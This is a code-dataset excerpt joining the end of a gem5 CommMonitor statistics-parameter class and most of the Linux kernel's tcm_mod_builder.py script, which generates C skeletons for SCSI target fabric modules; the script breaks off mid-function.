# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Thomas Grass
# Andreas Hansson
from m5.params import *
from MemObject import MemObject
# The communication monitor will most typically be used in combination
# with periodic dumping and resetting of stats using schedStatEvent
class CommMonitor(MemObject):
    """Pass-through monitor that sits between a master and a slave port
    and collects communication statistics (burst length, bandwidth,
    latency, inter-transaction times, outstanding/transaction counts,
    and address heatmaps), mostly as histograms sampled per period."""
    type = 'CommMonitor'

    # one port in each direction
    master = MasterPort("Master port")
    slave = SlavePort("Slave port")

    # control the sample period window length of this monitor
    sample_period = Param.Clock("1ms", "Sample period for histograms")

    # for each histogram, set the number of bins and enable the user
    # to disable the measurement, reads and writes use the same
    # parameters

    # histogram of burst length of packets (not using sample period)
    burst_length_bins = Param.Unsigned('20', "# bins in burst length " \
                                           "histograms")
    disable_burst_length_hists = Param.Bool(False, "Disable burst length " \
                                                "histograms")

    # bandwidth per sample period
    bandwidth_bins = Param.Unsigned('20', "# bins in bandwidth histograms")
    disable_bandwidth_hists = Param.Bool(False, "Disable bandwidth histograms")

    # latency from request to response (not using sample period)
    latency_bins = Param.Unsigned('20', "# bins in latency histograms")
    disable_latency_hists = Param.Bool(False, "Disable latency histograms")

    # inter transaction time (ITT) distributions in uniformly sized
    # bins up to the maximum, independently for read-to-read,
    # write-to-write and the combined request-to-request that does not
    # separate read and write requests
    itt_bins = Param.Unsigned('20', "# bins in ITT distributions")
    itt_max_bin = Param.Latency('100ns', "Max bin of ITT distributions")
    disable_itt_dists = Param.Bool(False, "Disable ITT distributions")

    # outstanding requests (that did not yet get a response) per
    # sample period
    outstanding_bins = Param.Unsigned('20', "# bins in outstanding " \
                                          "requests histograms")
    disable_outstanding_hists = Param.Bool(False, "Disable outstanding " \
                                               "requests histograms")

    # transactions (requests) observed per sample period
    transaction_bins = Param.Unsigned('20', "# bins in transaction " \
                                          "count histograms")
    disable_transaction_hists = Param.Bool(False, "Disable transaction count " \
                                               "histograms")

    # address distributions (heatmaps) with associated address masks
    # to selectively only look at certain bits of the address
    read_addr_mask = Param.Addr(MaxAddr, "Address mask for read address")
    write_addr_mask = Param.Addr(MaxAddr, "Address mask for write address")
    # NOTE: unlike the histograms above, address distributions default
    # to disabled.
    disable_addr_dists = Param.Bool(True, "Disable address distributions")
| bsd-3-clause |
jyh0082007/sigTaint | Documentation/target/tcm_mod_builder.py | 868 | 40692 | #!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
# Scratch globals shared between the helpers below.
tcm_dir = ""
fabric_ops = []            # function-pointer lines scraped from target_core_fabric.h
fabric_mod_dir = ""
fabric_mod_port = ""       # "lport" or "tport"; set by the *_include builders
fabric_mod_init_port = ""  # "nport" or "iport"; set by the *_include builders
def tcm_mod_err(msg):
    """Print *msg* and abort the script with exit status 1."""
    print msg
    sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
    """Create the fabric module output directory; return 1 if it exists."""
    if os.path.isdir(fabric_mod_dir_var) == True:
        return 1

    print "Creating fabric_mod_dir: " + fabric_mod_dir_var
    # NOTE(review): os.mkdir() returns None and raises on failure, so this
    # error branch looks unreachable in practice — confirm before relying on it.
    ret = os.mkdir(fabric_mod_dir_var)
    if ret:
        tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)

    return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
    """Emit <mod>_base.h with FC nacl/tpg/lport structs and set the
    module-level port naming globals to FC conventions (lport/nport)."""
    global fabric_mod_port
    global fabric_mod_init_port
    buf = ""

    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
    print "Writing file: " + f

    p = open(f, 'w');
    if not p:
        tcm_mod_err("Unable to open file: " + f)

    # Build the generated C header as one big string.
    buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
    buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_nacl {\n"
    buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
    buf += " u64 nport_wwpn;\n"
    buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
    buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
    buf += " struct se_node_acl se_node_acl;\n"
    buf += "};\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_tpg {\n"
    buf += " /* FC lport target portal group tag for TCM */\n"
    buf += " u16 lport_tpgt;\n"
    buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
    buf += " struct " + fabric_mod_name + "_lport *lport;\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
    buf += " struct se_portal_group se_tpg;\n"
    buf += "};\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_lport {\n"
    buf += " /* SCSI protocol the lport is providing */\n"
    buf += " u8 lport_proto_id;\n"
    buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
    buf += " u64 lport_wwpn;\n"
    buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
    buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
    buf += " struct se_wwn lport_wwn;\n"
    buf += "};\n"

    ret = p.write(buf)
    if ret:
        tcm_mod_err("Unable to write f: " + f)

    p.close()

    # FC uses lport (target side) / nport (initiator side) naming.
    fabric_mod_port = "lport"
    fabric_mod_init_port = "nport"
    return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
    """Emit <mod>_base.h with SAS nacl/tpg/tport structs and set the
    module-level port naming globals to SAS conventions (tport/iport)."""
    global fabric_mod_port
    global fabric_mod_init_port
    buf = ""

    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
    print "Writing file: " + f

    p = open(f, 'w');
    if not p:
        tcm_mod_err("Unable to open file: " + f)

    # Build the generated C header as one big string.
    buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
    buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_nacl {\n"
    buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
    buf += " u64 iport_wwpn;\n"
    buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
    buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
    buf += " struct se_node_acl se_node_acl;\n"
    buf += "};\n\n"
    buf += "struct " + fabric_mod_name + "_tpg {\n"
    buf += " /* SAS port target portal group tag for TCM */\n"
    buf += " u16 tport_tpgt;\n"
    buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
    buf += " struct " + fabric_mod_name + "_tport *tport;\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
    buf += " struct se_portal_group se_tpg;\n"
    buf += "};\n\n"
    buf += "struct " + fabric_mod_name + "_tport {\n"
    buf += " /* SCSI protocol the tport is providing */\n"
    buf += " u8 tport_proto_id;\n"
    buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
    buf += " u64 tport_wwpn;\n"
    buf += " /* ASCII formatted WWPN for SAS Target port */\n"
    buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
    buf += " struct se_wwn tport_wwn;\n"
    buf += "};\n"

    ret = p.write(buf)
    if ret:
        tcm_mod_err("Unable to write f: " + f)

    p.close()

    # SAS uses tport (target side) / iport (initiator side) naming.
    fabric_mod_port = "tport"
    fabric_mod_init_port = "iport"
    return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
    """Emit <mod>_base.h with iSCSI nacl/tpg/tport structs and set the
    module-level port naming globals to iSCSI conventions (tport/iport).
    Unlike FC/SAS, iSCSI identifies endpoints by name strings, not WWPNs."""
    global fabric_mod_port
    global fabric_mod_init_port
    buf = ""

    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
    print "Writing file: " + f

    p = open(f, 'w');
    if not p:
        tcm_mod_err("Unable to open file: " + f)

    # Build the generated C header as one big string.
    buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
    buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_nacl {\n"
    buf += " /* ASCII formatted InitiatorName */\n"
    buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
    buf += " struct se_node_acl se_node_acl;\n"
    buf += "};\n\n"
    buf += "struct " + fabric_mod_name + "_tpg {\n"
    buf += " /* iSCSI target portal group tag for TCM */\n"
    buf += " u16 tport_tpgt;\n"
    buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
    buf += " struct " + fabric_mod_name + "_tport *tport;\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
    buf += " struct se_portal_group se_tpg;\n"
    buf += "};\n\n"
    buf += "struct " + fabric_mod_name + "_tport {\n"
    buf += " /* SCSI protocol the tport is providing */\n"
    buf += " u8 tport_proto_id;\n"
    buf += " /* ASCII formatted TargetName for IQN */\n"
    buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
    buf += " struct se_wwn tport_wwn;\n"
    buf += "};\n"

    ret = p.write(buf)
    if ret:
        tcm_mod_err("Unable to write f: " + f)

    p.close()

    # iSCSI reuses the tport/iport naming of SAS.
    fabric_mod_port = "tport"
    fabric_mod_init_port = "iport"
    return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
    """Dispatch to the protocol-specific _base.h generator for
    proto_ident in {FC, SAS, iSCSI}; abort on anything else."""
    if proto_ident == "FC":
        tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
    elif proto_ident == "SAS":
        tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
    elif proto_ident == "iSCSI":
        tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
    else:
        print "Unsupported proto_ident: " + proto_ident
        sys.exit(1)

    return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
    """Emit <mod>_configfs.c: the fabric module's configfs glue
    (make/drop nodeacl, tpg and wwn callbacks, the
    target_core_fabric_ops table, and module init/exit).

    WWPN-specific lines are only generated for FC/SAS; iSCSI endpoints
    are purely name-based.
    """
    buf = ""

    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
    print "Writing file: " + f

    p = open(f, 'w');
    if not p:
        tcm_mod_err("Unable to open file: " + f)

    # ---- generated file header / includes ----
    buf = "#include <linux/module.h>\n"
    buf += "#include <linux/moduleparam.h>\n"
    buf += "#include <linux/version.h>\n"
    buf += "#include <generated/utsrelease.h>\n"
    buf += "#include <linux/utsname.h>\n"
    buf += "#include <linux/init.h>\n"
    buf += "#include <linux/slab.h>\n"
    buf += "#include <linux/kthread.h>\n"
    buf += "#include <linux/types.h>\n"
    buf += "#include <linux/string.h>\n"
    buf += "#include <linux/configfs.h>\n"
    buf += "#include <linux/ctype.h>\n"
    buf += "#include <asm/unaligned.h>\n\n"
    buf += "#include <target/target_core_base.h>\n"
    buf += "#include <target/target_core_fabric.h>\n"
    buf += "#include <target/target_core_fabric_configfs.h>\n"
    buf += "#include <target/target_core_configfs.h>\n"
    buf += "#include <target/configfs_macros.h>\n\n"
    buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
    buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"

    buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
    buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"

    # ---- <mod>_make_nodeacl() ----
    buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
    buf += " struct se_portal_group *se_tpg,\n"
    buf += " struct config_group *group,\n"
    buf += " const char *name)\n"
    buf += "{\n"
    buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
    buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"

    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " u64 wwpn = 0;\n"

    buf += " u32 nexus_depth;\n\n"
    buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
    buf += " return ERR_PTR(-EINVAL); */\n"
    buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
    buf += " if (!se_nacl_new)\n"
    buf += " return ERR_PTR(-ENOMEM);\n"
    buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
    buf += " nexus_depth = 1;\n"
    buf += " /*\n"
    buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
    buf += " * when converting a NodeACL from demo mode -> explict\n"
    buf += " */\n"
    buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
    buf += " name, nexus_depth);\n"
    buf += " if (IS_ERR(se_nacl)) {\n"
    buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
    buf += " return se_nacl;\n"
    buf += " }\n"
    buf += " /*\n"
    buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
    buf += " */\n"
    buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"

    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"

    buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
    buf += " return se_nacl;\n"
    buf += "}\n\n"

    # ---- <mod>_drop_nodeacl() ----
    buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
    buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
    buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
    buf += " kfree(nacl);\n"
    buf += "}\n\n"

    # ---- <mod>_make_tpg() / _drop_tpg() ----
    buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
    buf += " struct se_wwn *wwn,\n"
    buf += " struct config_group *group,\n"
    buf += " const char *name)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
    buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
    buf += " unsigned long tpgt;\n"
    buf += " int ret;\n\n"
    buf += " if (strstr(name, \"tpgt_\") != name)\n"
    buf += " return ERR_PTR(-EINVAL);\n"
    buf += " if (kstrtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
    buf += " return ERR_PTR(-EINVAL);\n\n"
    buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
    buf += " if (!tpg) {\n"
    buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
    buf += " return ERR_PTR(-ENOMEM);\n"
    buf += " }\n"
    buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
    buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
    buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
    buf += " &tpg->se_tpg, (void *)tpg,\n"
    buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
    buf += " if (ret < 0) {\n"
    buf += " kfree(tpg);\n"
    buf += " return NULL;\n"
    buf += " }\n"
    buf += " return &tpg->se_tpg;\n"
    buf += "}\n\n"
    buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
    buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
    buf += " core_tpg_deregister(se_tpg);\n"
    buf += " kfree(tpg);\n"
    buf += "}\n\n"

    # ---- <mod>_make_<port>() / _drop_<port>() ----
    buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
    buf += " struct target_fabric_configfs *tf,\n"
    buf += " struct config_group *group,\n"
    buf += " const char *name)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"

    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " u64 wwpn = 0;\n\n"

    buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
    buf += " return ERR_PTR(-EINVAL); */\n\n"
    buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
    buf += " if (!" + fabric_mod_port + ") {\n"
    buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
    buf += " return ERR_PTR(-ENOMEM);\n"
    buf += " }\n"

    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"

    buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
    buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
    buf += "}\n\n"
    buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
    buf += " kfree(" + fabric_mod_port + ");\n"
    buf += "}\n\n"

    # ---- version attribute ----
    buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
    buf += " struct target_fabric_configfs *tf,\n"
    buf += " char *page)\n"
    buf += "{\n"
    buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
    buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
    buf += " utsname()->machine);\n"
    buf += "}\n\n"
    buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
    buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
    buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
    buf += " NULL,\n"
    buf += "};\n\n"

    # ---- target_core_fabric_ops table ----
    buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
    buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
    buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
    buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
    buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
    buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
    buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
    buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
    buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
    buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
    buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
    buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
    buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
    buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
    buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
    buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
    buf += " .release_cmd = " + fabric_mod_name + "_release_cmd,\n"
    buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
    buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
    buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
    buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
    buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
    buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
    buf += " .sess_get_initiator_sid = NULL,\n"
    buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
    buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
    buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
    buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
    buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
    buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
    buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
    buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
    buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
    buf += " /*\n"
    buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
    buf += " */\n"
    buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
    buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
    buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
    buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
    buf += " .fabric_post_link = NULL,\n"
    buf += " .fabric_pre_unlink = NULL,\n"
    buf += " .fabric_make_np = NULL,\n"
    buf += " .fabric_drop_np = NULL,\n"
    buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
    buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
    buf += "};\n\n"

    # ---- configfs registration / deregistration and module glue ----
    buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
    buf += "{\n"
    buf += " struct target_fabric_configfs *fabric;\n"
    buf += " int ret;\n\n"
    buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
    buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
    buf += " utsname()->machine);\n"
    buf += " /*\n"
    buf += " * Register the top level struct config_item_type with TCM core\n"
    buf += " */\n"
    buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
    buf += " if (IS_ERR(fabric)) {\n"
    buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
    buf += " return PTR_ERR(fabric);\n"
    buf += " }\n"
    buf += " /*\n"
    buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
    buf += " */\n"
    buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
    buf += " /*\n"
    buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
    buf += " */\n"
    buf += " fabric->tf_cit_tmpl.tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
    buf += " fabric->tf_cit_tmpl.tfc_tpg_base_cit.ct_attrs = NULL;\n"
    buf += " fabric->tf_cit_tmpl.tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
    buf += " fabric->tf_cit_tmpl.tfc_tpg_param_cit.ct_attrs = NULL;\n"
    buf += " fabric->tf_cit_tmpl.tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
    buf += " fabric->tf_cit_tmpl.tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
    buf += " fabric->tf_cit_tmpl.tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
    buf += " fabric->tf_cit_tmpl.tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
    buf += " fabric->tf_cit_tmpl.tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
    buf += " /*\n"
    buf += " * Register the fabric for use within TCM\n"
    buf += " */\n"
    buf += " ret = target_fabric_configfs_register(fabric);\n"
    buf += " if (ret < 0) {\n"
    buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
    buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
    buf += " return ret;\n"
    buf += " }\n"
    buf += " /*\n"
    buf += " * Setup our local pointer to *fabric\n"
    buf += " */\n"
    buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
    buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
    buf += " return 0;\n"
    buf += "};\n\n"
    buf += "static void __exit " + fabric_mod_name + "_deregister_configfs(void)\n"
    buf += "{\n"
    buf += " if (!" + fabric_mod_name + "_fabric_configfs)\n"
    buf += " return;\n\n"
    buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
    buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
    buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
    buf += "};\n\n"
    buf += "static int __init " + fabric_mod_name + "_init(void)\n"
    buf += "{\n"
    buf += " int ret;\n\n"
    buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
    buf += " if (ret < 0)\n"
    buf += " return ret;\n\n"
    buf += " return 0;\n"
    buf += "};\n\n"
    buf += "static void __exit " + fabric_mod_name + "_exit(void)\n"
    buf += "{\n"
    buf += " " + fabric_mod_name + "_deregister_configfs();\n"
    buf += "};\n\n"
    buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
    buf += "MODULE_LICENSE(\"GPL\");\n"
    buf += "module_init(" + fabric_mod_name + "_init);\n"
    buf += "module_exit(" + fabric_mod_name + "_exit);\n"

    ret = p.write(buf)
    if ret:
        tcm_mod_err("Unable to write f: " + f)

    p.close()
    return
def tcm_mod_scan_fabric_ops(tcm_dir):
	"""Scan target_core_fabric.h and collect fabric-ops function pointers.

	Reads the kernel header at <tcm_dir>/include/target/target_core_fabric.h
	line by line and appends every line containing a function-pointer
	declaration (matched by '(*') to the module-level ``fabric_ops`` list.
	The ``process_fo`` flag skips the 'struct target_core_fabric_ops {'
	opening line before collection starts.
	"""
	fabric_ops_api = tcm_dir + "include/target/target_core_fabric.h"
	print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
	process_fo = 0;
	p = open(fabric_ops_api, 'r')
	line = p.readline()
	while line:
		# Skip the struct opening line itself; members follow it.
		if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
			line = p.readline()
			continue
		# First pass after the struct header: flip the flag, then fall
		# into the same match-and-collect logic as the steady state.
		if process_fo == 0:
			process_fo = 1;
			line = p.readline()
			# Search for function pointer
			if not re.search('\(\*', line):
				continue
			fabric_ops.append(line.rstrip())
			continue
		line = p.readline()
		# Search for function pointer
		if not re.search('\(\*', line):
			continue
		fabric_ops.append(line.rstrip())
	p.close()
	return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
	"""Generate <fabric_mod_name>_fabric.c and _fabric.h skeletons.

	For every function pointer previously collected into the global
	``fabric_ops`` list by tcm_mod_scan_fabric_ops(), emit a stub C
	implementation into ``buf`` (written to the .c file) and a matching
	prototype into ``bufi`` (written to the .h file).  ``proto_ident``
	selects the FC/SAS/iSCSI helper calls in the protocol-dependent stubs.
	NOTE(review): relies on module globals ``fabric_ops`` and
	``fabric_mod_port`` being populated by earlier steps.
	"""
	buf = ""
	bufi = ""
	f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
	print "Writing file: " + f
	p = open(f, 'w')
	if not p:
		tcm_mod_err("Unable to open file: " + f)
	fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
	print "Writing file: " + fi
	pi = open(fi, 'w')
	if not pi:
